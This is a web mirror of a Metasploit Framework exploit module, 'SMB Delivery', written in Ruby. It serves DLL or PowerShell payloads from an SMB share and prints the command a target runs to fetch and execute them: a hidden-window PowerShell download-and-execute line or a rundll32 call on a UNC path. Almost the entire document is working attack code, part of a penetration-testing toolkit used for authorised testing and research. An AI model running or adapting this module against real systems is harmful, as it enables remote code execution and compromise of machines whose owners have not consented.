CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/smb/smb_delivery.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6


7
class MetasploitModule < Msf::Exploit::Remote

8
  Rank = ExcellentRanking

9


10
  include Msf::Exploit::EXE

11
  include Msf::Exploit::Remote::SMB::Server::Share

12
  include Msf::Exploit::Powershell

13


14
  def initialize(info={})

15
    super(update_info(info,

16
      'Name'           => "SMB Delivery",

17
      'Description'    => %q{

18
        This module serves payloads via an SMB server and provides commands to retrieve

19
        and execute the generated payloads. Currently supports DLLs and Powershell.

20
      },

21
      'License'        => MSF_LICENSE,

22
      'Author'         =>

23
        [

24
          'Andrew Smith',

25
          'Russel Van Tuyl'

26
        ],

27
      'References'     =>

28
        [

29
          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/3074']

30
        ],

31
      'Payload'        =>

32
        {

33
          'Space'       => 2048,

34
          'DisableNops' => true

35
        },

36
        'Platform'       => 'win',

37
        'Targets'        =>

38
          [

39
            ['DLL', {

40
              'Platform' => 'win',

41
              'Arch' => [ARCH_X86, ARCH_X64]

42
            }],

43
            ['PSH', {

44
              'Platform' => 'win',

45
              'Arch' => [ARCH_X86, ARCH_X64]

46
            }]

47
          ],

48
        'Privileged'     => false,

49
        'DisclosureDate' => '2016-07-26',

50
        'DefaultTarget'  => 0))

51


52
    register_options(

53
      [

54
        OptString.new('FILE_NAME', [ false, 'DLL file name', 'test.dll'])

55
      ])

56
  end

57


58
  def primer

59
    print_status('Run the following command on the target machine:')

60
    case target.name

61
    when 'PSH'

62
      self.file_contents = cmd_psh_payload(  payload.encoded,

63
                                             payload_instance.arch.first,

64
                                             remove_comspec: true,

65
                                             wrap_double_quotes: true)

66


67
      download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(unc)

68
      download_and_run = "#{ignore_cert}#{download_string}"

69
      print_line generate_psh_command_line(  noprofile: true,

70
                                             windowstyle: 'hidden',

71
                                             command: download_and_run)

72
    when 'DLL'

73
      self.file_contents = generate_payload_dll

74
      print_line("rundll32.exe #{unc},0")

75
    end

76
  end

77
end

78


79